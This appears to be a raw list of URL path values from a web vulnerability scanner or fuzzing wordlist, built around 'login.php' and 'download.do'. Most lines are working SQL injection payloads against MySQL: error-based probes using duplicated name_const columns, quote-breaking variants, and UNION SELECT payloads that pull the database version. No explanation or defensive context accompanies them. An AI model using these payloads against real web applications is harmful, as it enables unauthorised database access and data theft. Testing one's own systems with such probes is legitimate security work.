login.php
download.do
download.do or (1,2)=(select*from(select name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1),name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1))a) -- and 1=1
download.do"
download.do" or (1,2)=(select*from(select name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1),name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1))a) -- "x"="x
download.do' or (1,2)=(select*from(select name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1),name_const(CHAR(103,71,111,77,102,104,65,111,101,81,106,86),1))a) -- 'x'='x
download.do2121121121212.1
download.do99999" union select unhex(hex(version())) -- "x"="x
download.do99999' union select unhex(hex(version())) -- 'x'='x
download.do999999.1 union select unhex(hex(version())) -- and 1=1
login.php